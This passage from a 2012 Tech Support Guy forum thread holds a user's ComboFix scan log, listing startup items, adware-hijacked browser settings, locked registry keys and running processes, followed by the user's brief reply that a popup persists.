[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
backup=c:\windows\pss\Metacafe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
\HWSetup.exe hwSetUP [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
2011-12-13 04:20 3305760 ----a-w- c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2012-02-21 01:28 59240 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
2007-04-10 23:40 413696 ----a-w- c:\program files\Camera Assistant Software for Toshiba\traybar.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
2010-02-10 12:39 16040 ----a-w- c:\program files\Dell V305\dldtamon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
2010-02-10 12:39 672424 ----a-w- c:\program files\Dell V305\dldtmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
2007-11-26 21:00 188928 ----a-w- c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
2007-01-01 21:22 3739648 ----a-w- c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
2006-12-07 23:49 55416 ----a-w- c:\program files\Toshiba\TBS\HSON.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2012-03-27 09:09 421736 ----a-w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
2006-11-07 00:14 34352 ----a-w- c:\program files\Toshiba\Utilities\KeNotify.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
2009-06-18 07:08 1062184 ----a-w- c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
2009-02-27 06:22 2785608 ----a-w- c:\program files\Pando Networks\Media Booster\PMB.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2011-10-24 19:28 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
2007-06-13 17:11 4489216 ----a-w- c:\windows\RtHDVCpl.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
2007-05-29 00:39 1826816 ----a-w- c:\windows\SkyTel.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
2007-03-22 18:46 448632 ----a-w- c:\program files\Toshiba\SmoothView\SmoothView.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
2008-01-19 07:33 49664 ----a-w- c:\windows\Speech\Common\sapisvr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2006-11-10 16:35 90112 ----a-w- c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
2006-03-23 04:42 438272 ----a-w- c:\program files\Toshiba\Utilities\SVPWUTIL.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2009-03-20 11:36 1451304 ----a-w- c:\program files\Synaptics\SynTP\SynTPEnh.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
2007-03-29 17:39 411192 ----a-w- c:\program files\Toshiba\Power Saver\TPwrMain.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
2011-06-30 10:11 2648184 ----a-w- c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2012-05-30 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
.
2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2012-05-30 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
- c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
LSP: c:\windows\system32\wpclsp.dll
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-05-30 00:09
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aif\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aifc\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aiff\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.au\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.flac\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.m3u\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.mid\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.midi\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.mp3\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.ogg\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.pcm\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.pls\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.snd\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.spx\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.wav\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.wma\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
@Denied: (Read) (RestrictedCode)
@Denied: (Read) (LocalSystem)
@Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Read) (Administrators)
@SACL=(02 0001)
@Ace=(0x11) (1) (S-1-16-4096)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
@SACL=(02 0001)
"lastact"=dword:00003640
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHis tory]
@SACL=(02 0001)
"srch_ebox"=dword:4785b178
"srch_hlt"=dword:47854ece
"clkstrm"=dword:4785b2dc
"boo"=dword:4785b2dc
"etpg70_21"=dword:47854ece
"sst"=dword:47854ecf
"mess"=dword:4785b2dc
"mess_off"=dword:4785b2dc
"yma"=dword:47854eda
"mus"=dword:47854edb
"wik"=dword:47854edb
"vis_srch70"=dword:4785abea
"cacheldr"=dword:4785b2dc
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistor y]
@SACL=(02 0001)
"srch"=dword:4785abec
"vis_srch70"=dword:4785abec
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
@SACL=(02 0001)
"LastPoll_200"=dword:00041537
"resfeed"=dword:00000002
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
"InstallStarted"=dword:00000000
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
"DisplayName"="jlGui 3.0"
"DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\ cache\\6.0\\57\\573addb9-2492e35c.ico"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001
"Publisher"="Music Player for the Java(tm) Platform"
"Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
"URLInfoAbout"="http://www.javazoom.net"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"bgu0fw0tDZx8jtqEjccbDg==
"=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
96
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta]
@Denied: (Full) (Administrators)
@Denied: (Full) (Owner)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (Administrators)
@Denied: (Full) (Users)
@SACL=
"PerceivedType"="text"
@="htafile"
"Content Type"="application/hta"
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
@="{eec97550-47a9-11cf-b952-00aa0051fe20}"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Microsoft Security Client\MsMpEng.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\agrsmsvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\progra~1\mcafee\SITEAD~1\mcsacore.exe
c:\program files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
c:\windows\system32\rundll32.exe
c:\windows\System32\tcpsvcs.exe
c:\program files\TeamViewer\Version6\TeamViewer_Service.exe
c:\program files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
c:\windows\system32\TODDSrv.exe
c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
c:\program files\TeamViewer\Version6\TeamViewer.exe
c:\program files\Synaptics\SynTP\SynToshiba.exe
c:\program files\iPod\bin\iPodService.exe
c:\windows\system32\mshta.exe
c:\program files\Synaptics\SynTP\SynTPHelper.exe
c:\program files\Yahoo!\Messenger\ymsgr_tray.exe
c:\windows\system32\mshta.exe
.
**************************************************************************
.
Completion time: 2012-05-30 00:16:00 - machine was rebooted
ComboFix-quarantined-files.txt 2012-05-30 04:15
ComboFix2.txt 2012-05-29 18:01
ComboFix3.txt 2012-05-29 02:55
.
Pre-Run: 29,436,858,368 bytes free
Post-Run: 29,280,116,736 bytes free
.
- - End Of File - - 443FBEB5CCBB3C0435B8375034C71986

Last edited by gagraptor; 30-May-2012 at 12:33 AM..
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
29-May-2012, 02:07 PM #15
the popup is still there not gone yet
As Seen On

BBC, Reader's Digest, PC Magazine, Today Show, Money Magazine
WELCOME TO TECH SUPPORT GUY!

Are you looking for the solution to your computer problem? Join our site today to ask your question. This site is completely free -- paid for by advertisers and donations.

If you're not already familiar with forums, watch our Welcome Guide to get started.


(clock)
THIS THREAD HAS EXPIRED.
Are you having the same problem? We have volunteers ready to answer your question, but first you'll have to join for free. Need help getting started? Check out our Welcome Guide.

Search Tech Support Guy

Find the solution to your
computer problem!




Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools


WELCOME
You Are Using: Server ID
Trusted Website Back to the Top ↑